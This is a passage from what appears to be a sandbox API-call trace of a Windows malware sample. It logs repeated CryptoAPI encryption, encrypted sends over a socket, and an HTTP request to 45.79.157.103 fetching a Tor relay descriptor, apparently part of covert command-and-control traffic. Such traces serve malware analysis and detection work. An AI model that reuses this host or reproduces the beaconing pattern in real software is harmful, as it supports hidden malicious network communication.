pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0157.840] CryptEncrypt (in: hKey=0x432db8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0157.840] CryptDestroyKey (hKey=0x432db8) returned 1 [0157.840] malloc (_Size=0x100) returned 0x606108 [0157.840] free (_Block=0x0) [0157.840] free (_Block=0x0) [0157.840] free (_Block=0x3e224b8) [0157.841] free (_Block=0x60a3e0) [0157.841] free (_Block=0x3df0550) [0157.841] free (_Block=0x3648cf8) [0157.841] malloc (_Size=0xba) returned 0x3df0550 [0157.841] free (_Block=0x0) [0157.841] malloc (_Size=0x202) returned 0x3d81e60 [0157.841] free (_Block=0x0) [0157.841] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f45c, MessageSeqNo=0x0 | out: pMessage=0x316f45c) returned 0x0 [0157.841] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0157.841] free (_Block=0x3d81e60) [0157.841] free (_Block=0x3df0550) [0157.841] free (_Block=0x606108) [0157.841] GetTickCount () returned 0x1168479 [0157.841] malloc (_Size=0x10) returned 0x3648e60 [0157.841] free (_Block=0x0) [0157.841] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e60*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0157.842] free (_Block=0x3648e60) [0157.842] GetTickCount () returned 0x1168479 [0157.842] malloc (_Size=0x10) returned 0x3648e18 [0157.842] free (_Block=0x0) [0157.842] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e18*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0158.155] free (_Block=0x3648e18) [0158.155] GetTickCount () returned 0x11685b2 [0158.155] SetEvent (hEvent=0x380) returned 1 [0158.155] malloc (_Size=0x34) returned 0x3624330 [0158.155] malloc (_Size=0x338) returned 0x36915b0 [0158.155] malloc (_Size=0x80) returned 0x60a578 [0158.155] free (_Block=0x0) [0158.155] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a578 | out: pbBuffer=0x60a578) returned 1 [0158.155] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f188, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f184 | out: phKey=0x316f184*=0x432cb8) returned 1 [0158.158] CryptExportKey (in: hKey=0x432cb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ede4, pdwDataLen=0x316edcc | out: pbData=0x316ede4*, pdwDataLen=0x316edcc*=0x90) returned 1 [0158.158] free (_Block=0x60a578) [0158.158] malloc (_Size=0x10) returned 0x3648e18 [0158.158] free (_Block=0x0) [0158.159] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648e18 | out: pbBuffer=0x3648e18) returned 1 [0158.159] malloc (_Size=0x40) returned 0x3e22470 [0158.159] free (_Block=0x0) [0158.159] malloc (_Size=0x104) returned 0x606108 [0158.159] free (_Block=0x3e22470) [0158.159] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x60dc10, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f384, pcbStructInfo=0x316f35c | out: pvStructInfo=0x316f384, pcbStructInfo=0x316f35c) returned 1 [0158.159] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f384, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f380 | out: phKey=0x316f380*=0x432d38) returned 1 [0158.159] malloc (_Size=0x80) returned 0x6097a8 [0158.159] free (_Block=0x0) [0158.159] CryptEncrypt (in: hKey=0x432d38, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x6097a8*, pdwDataLen=0x316f350*=0x56, dwBufLen=0x80 | out: pbData=0x6097a8*, pdwDataLen=0x316f350*=0x80) returned 1 [0158.159] CryptDestroyKey (hKey=0x432d38) returned 1 [0158.159] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f420, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f41c | out: phKey=0x316f41c*=0x4329f8) returned 1 [0158.159] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0158.159] malloc (_Size=0x3a) returned 0x3e22470 [0158.160] free (_Block=0x0) [0158.160] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0158.160] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0158.160] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0158.160] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0158.160] CryptDestroyKey (hKey=0x4329f8) returned 1 [0158.160] malloc (_Size=0x100) returned 0x606218 [0158.160] free (_Block=0x0) [0158.160] free (_Block=0x0) [0158.160] free (_Block=0x3e22470) [0158.160] free (_Block=0x6097a8) [0158.160] free (_Block=0x606108) [0158.160] free (_Block=0x3648e18) [0158.160] malloc (_Size=0xd4) returned 0x606108 [0158.160] free (_Block=0x0) [0158.160] malloc (_Size=0xd4) returned 0x3d81e60 [0158.160] free (_Block=0x0) [0158.161] free (_Block=0x0) [0158.161] malloc (_Size=0x1fd) returned 0x60e6c0 [0158.161] free (_Block=0x0) [0158.161] CryptHashData (hHash=0x432b78, pbData=0x60e6c0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0158.161] CryptDuplicateHash (in: hHash=0x432b78, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f47c | out: phHash=0x316f47c) returned 1 [0158.161] malloc (_Size=0x14) returned 0x3f65280 [0158.161] free (_Block=0x0) [0158.161] CryptGetHashParam (in: hHash=0x4327b8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f414, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f414) returned 1 [0158.161] CryptDestroyHash (hHash=0x4327b8) returned 1 [0158.161] free (_Block=0x3f65280) [0158.161] malloc (_Size=0x1fd) returned 0x60e8c8 [0158.161] free (_Block=0x0) [0158.161] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.161] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.161] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.161] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.161] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.162] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.163] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0158.164] malloc (_Size=0x1fd) returned 0x60ead0 [0158.164] free (_Block=0x0) [0158.164] free (_Block=0x0) [0158.164] free (_Block=0x60e8c8) [0158.164] free (_Block=0x60e6c0) [0158.164] malloc (_Size=0x202) returned 0x60e6c0 [0158.164] free (_Block=0x0) [0158.164] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f404, MessageSeqNo=0x0 | out: pMessage=0x316f404) returned 0x0 [0158.164] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0158.165] free (_Block=0x60e6c0) [0158.165] free (_Block=0x3d81e60) [0158.165] free (_Block=0x60ead0) [0158.165] free (_Block=0x606108) [0158.165] free (_Block=0x606218) [0158.165] GetTickCount () returned 0x11685c2 [0158.165] malloc (_Size=0x10) returned 0x3648ec0 [0158.165] free (_Block=0x0) [0158.165] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ec0*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0158.165] free (_Block=0x3648ec0) [0158.165] GetTickCount () returned 0x11685c2 [0158.165] malloc (_Size=0x10) returned 0x3648d10 [0158.165] free (_Block=0x0) [0158.165] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d10*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x102 [0188.251] free (_Block=0x3648d10) [0188.251] GetTickCount () returned 0x116fb30 [0188.251] malloc (_Size=0x202) returned 0x606108 [0188.252] free (_Block=0x0) [0188.252] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f484, MessageSeqNo=0x0 | out: pMessage=0x316f484) returned 0x0 [0188.253] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0188.255] free (_Block=0x606108) [0188.255] free (_Block=0x0) [0188.255] CryptDestroyKey (hKey=0x432cb8) returned 1 [0188.257] free (_Block=0x36915b0) [0188.257] free (_Block=0x3624330) [0188.257] CryptDestroyKey (hKey=0x432af8) returned 1 [0188.260] free (_Block=0x3691270) [0188.260] CryptDestroyHash (hHash=0x432bb8) returned 1 [0188.260] CryptDestroyHash (hHash=0x432b78) returned 1 [0188.260] CryptDestroyKey (hKey=0x432df8) returned 1 [0188.260] CryptDestroyKey (hKey=0x4328f8) returned 1 [0188.260] free (_Block=0x3df0550) [0188.260] free (_Block=0x36241f0) [0188.260] SetEvent (hEvent=0x380) returned 1 [0188.260] SetEvent (hEvent=0x5b0) returned 1 [0188.260] free (_Block=0x3648d70) [0188.260] free (_Block=0x0) [0188.260] CloseHandle (hObject=0x5b0) returned 1 [0188.261] CloseHandle (hObject=0x380) returned 1 [0188.261] free (_Block=0x3d9ab40) [0188.261] malloc (_Size=0x50) returned 0x3d9aae8 [0188.261] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0188.261] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5b0 [0188.261] SetEvent (hEvent=0x380) returned 1 [0188.261] malloc (_Size=0x34) returned 0x3624370 [0188.261] malloc (_Size=0x338) returned 0x3691270 [0188.261] malloc (_Size=0x80) returned 0x6097a8 [0188.261] free (_Block=0x0) [0188.261] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x6097a8 | out: pbBuffer=0x6097a8) returned 1 [0188.262] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f178, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f174 | out: phKey=0x316f174*=0x432af8) returned 1 [0188.267] CryptExportKey (in: hKey=0x432af8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316edd4, pdwDataLen=0x316edbc | out: pbData=0x316edd4*, pdwDataLen=0x316edbc*=0x90) returned 1 [0188.268] free (_Block=0x6097a8) [0188.268] malloc (_Size=0x10) returned 0x3648c80 [0188.268] free (_Block=0x0) [0188.268] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648c80 | out: pbBuffer=0x3648c80) returned 1 [0188.268] malloc (_Size=0x40) returned 0x3e226b0 [0188.268] free (_Block=0x0) [0188.268] malloc (_Size=0x104) returned 0x3df0550 [0188.268] free (_Block=0x3e226b0) [0188.268] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x605a18, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f374, pcbStructInfo=0x316f34c | out: pvStructInfo=0x316f374, pcbStructInfo=0x316f34c) returned 1 [0188.269] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f374, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f370 | out: phKey=0x316f370*=0x432df8) returned 1 [0188.269] malloc (_Size=0x80) returned 0x6098b8 [0188.269] free (_Block=0x0) [0188.269] CryptEncrypt (in: hKey=0x432df8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x6098b8*, pdwDataLen=0x316f340*=0x56, dwBufLen=0x80 | out: pbData=0x6098b8*, pdwDataLen=0x316f340*=0x80) returned 1 [0188.270] CryptDestroyKey (hKey=0x432df8) returned 1 [0188.270] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f410, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f40c | out: phKey=0x316f40c*=0x432b78) returned 1 [0188.270] CryptSetKeyParam (hKey=0x432b78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0188.270] malloc (_Size=0x3a) returned 0x3e22038 [0188.270] free (_Block=0x0) [0188.270] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0188.270] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0188.271] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0188.271] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0188.271] CryptDestroyKey (hKey=0x432b78) returned 1 [0188.271] malloc (_Size=0x100) returned 0x606108 [0188.271] free (_Block=0x0) [0188.271] free (_Block=0x0) [0188.271] free (_Block=0x3e22038) [0188.271] free (_Block=0x6098b8) [0188.271] free (_Block=0x3df0550) [0188.271] free (_Block=0x3648c80) [0188.271] malloc (_Size=0xba) returned 0x3df0550 [0188.271] free (_Block=0x0) [0188.271] malloc (_Size=0x202) returned 0x3d81e60 [0188.271] free (_Block=0x0) [0188.271] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f45c, MessageSeqNo=0x0 | out: pMessage=0x316f45c) returned 0x0 [0188.271] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0188.272] free (_Block=0x3d81e60) [0188.272] free (_Block=0x3df0550) [0188.272] free (_Block=0x606108) [0188.272] GetTickCount () returned 0x116fb4f [0188.272] malloc (_Size=0x10) returned 0x3648cf8 [0188.272] free (_Block=0x0) [0188.272] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648cf8*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0188.272] free (_Block=0x3648cf8) [0188.272] GetTickCount () returned 0x116fb4f [0188.272] malloc (_Size=0x10) returned 0x3648ec0 [0188.272] free (_Block=0x0) [0188.272] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ec0*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0188.652] free (_Block=0x3648ec0) [0188.652] GetTickCount () returned 0x116fcc6 [0188.652] SetEvent (hEvent=0x380) returned 1 [0188.652] malloc (_Size=0x34) returned 0x36246f0 [0188.652] malloc (_Size=0x338) returned 0x36915b0 [0188.652] malloc (_Size=0x80) returned 0x609e90 [0188.652] free (_Block=0x0) [0188.652] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x609e90 | out: pbBuffer=0x609e90) returned 1 [0188.652] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f188, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f184 | out: phKey=0x316f184*=0x4329f8) returned 1 [0188.657] CryptExportKey (in: hKey=0x4329f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ede4, pdwDataLen=0x316edcc | out: pbData=0x316ede4*, pdwDataLen=0x316edcc*=0x90) returned 1 [0188.657] free (_Block=0x609e90) [0188.657] CryptBinaryToStringA (in: pbBinary=0x3dd2718, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x316f48c | out: pszString=0x0, pcchString=0x316f48c) returned 1 [0188.657] malloc (_Size=0x29) returned 0x3624b10 [0188.657] free (_Block=0x0) [0188.657] CryptBinaryToStringA (in: pbBinary=0x3dd2718, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624b10, pcchString=0x316f48c | out: pszString="2ce96a8a1da032664c90f574affbece18a6e8dfc", pcchString=0x316f48c) returned 1 [0188.657] malloc (_Size=0x10) returned 0x3648e18 [0188.657] free (_Block=0x0) [0188.657] malloc (_Size=0x10) returned 0x3648e90 [0188.657] free (_Block=0x0) [0188.657] malloc (_Size=0x38) returned 0x36240f0 [0188.658] free (_Block=0x3648e90) [0188.658] malloc (_Size=0x8) returned 0x3f4c068 [0188.658] free (_Block=0x0) [0188.658] malloc (_Size=0x10) returned 0x3648c80 [0188.658] free (_Block=0x0) [0188.658] malloc (_Size=0x50) returned 0x3d9ad50 [0188.658] free (_Block=0x3648c80) [0188.658] malloc (_Size=0x150) returned 0x3d80d60 [0188.658] free (_Block=0x3d9ad50) [0188.658] malloc (_Size=0x550) returned 0x60e6c0 [0188.658] free (_Block=0x3d80d60) [0188.659] malloc (_Size=0x1550) returned 0x3d9f530 [0188.659] free (_Block=0x60e6c0) [0188.661] malloc (_Size=0x5550) returned 0x348c1b8 [0188.662] free (_Block=0x3d9f530) [0188.662] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x316f3b4 | out: pbBuffer=0x316f3b4) returned 1 [0188.662] free (_Block=0x348c1b8) [0188.662] free (_Block=0x0) [0188.662] free (_Block=0x0) [0188.662] free (_Block=0x3f4c068) [0188.662] inet_ntoa (in=0x679d4f2d) returned="45.79.157.103" [0188.663] malloc (_Size=0xe) returned 0x3648d58 [0188.663] free (_Block=0x0) [0188.663] gethostbyname (name="45.79.157.103") returned 0x42bbb8*(h_name="45.79.157.103", h_aliases=0x42bbc8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42bbcc*=([0]="45.79.157.103")) [0188.665] htons (hostshort=0x50) returned 0x5000 [0188.665] socket (af=2, type=1, protocol=6) returned 0x298 [0188.665] connect (s=0x298, name=0x316f390*(sa_family=2, sin_port=0x50, sin_addr="45.79.157.103"), namelen=16) returned 0 [0188.817] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f358) returned 93 [0188.818] malloc (_Size=0x5e) returned 0x60e150 [0188.818] free (_Block=0x0) [0188.818] vsprintf_s (in: _DstBuf=0x60e150, _SizeInBytes=0x5e, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f358 | out: _DstBuf="GET /tor/server/fp/2ce96a8a1da032664c90f574affbece18a6e8dfc HTTP/1.0\r\nHost: 45.79.157.103\r\n\r\n") returned 93 [0188.818] send (s=0x298, buf=0x60e150*, len=94, flags=0) returned 94 [0188.819] recv (in: s=0x298, buf=0x316e354, len=4096, flags=0 | out: buf=0x316e354*) returned 2000 [0188.969] malloc (_Size=0x7d1) returned 0x60e6c0 [0188.969] free (_Block=0x0) [0188.969] recv (in: s=0x298, buf=0x316e354, len=4096, flags=0 | out: buf=0x316e354*) returned 1552 [0188.969] malloc (_Size=0xde1) returned 0x60cdc0 [0188.969] free (_Block=0x60e6c0) [0188.969] recv (in: s=0x298, buf=0x316e354, len=4096, flags=0 | out: buf=0x316e354) returned 0 [0188.969] closesocket (s=0x298) returned 0 [0188.970] malloc (_Size=0xd2a) returned 0x36929c0 [0188.970] free (_Block=0x0) [0188.970] free (_Block=0x60cdc0) [0188.970] free (_Block=0x60e150) [0188.970] closesocket (s=0xffffffff) returned -1 [0188.970] free (_Block=0x0) [0188.970] free (_Block=0x3648d58) [0188.970] free (_Block=0x0) [0188.970] free (_Block=0x36240f0) [0188.970] free (_Block=0x3648e18) [0188.970] free (_Block=0x3624b10) [0188.970] malloc (_Size=0xd2a) returned 0x60cdc0 [0188.971] free (_Block=0x0) [0188.971] malloc (_Size=0x2a) returned 0x3624b10 [0188.971] free (_Block=0x0) [0188.971] malloc (_Size=0x40) returned 0x3e22350 [0188.971] free (_Block=0x0) [0188.971] free (_Block=0x0) [0188.971] memchr (_Buf=0x60cdea, _Val=10, _MaxCount=0xcff) returned 0x60cdfa [0188.971] malloc (_Size=0x11) returned 0x3f653c0 [0188.971] free (_Block=0x0) [0188.971] free (_Block=0x0) [0188.971] memchr (_Buf=0x60cdfb, _Val=10, _MaxCount=0xcee) returned 0x60ce17 [0188.971] malloc (_Size=0x1d) returned 0x3d800a8 [0188.971] free (_Block=0x0) [0188.971] free (_Block=0x0) [0188.971] memchr (_Buf=0x60ce18, _Val=10, _MaxCount=0xcd1) returned 0x60ce58 [0188.971] malloc (_Size=0x41) returned 0x3defc20 [0188.971] free (_Block=0x0) [0188.971] free (_Block=0x0) [0188.971] memchr (_Buf=0x60ce59, _Val=10, _MaxCount=0xc90) returned 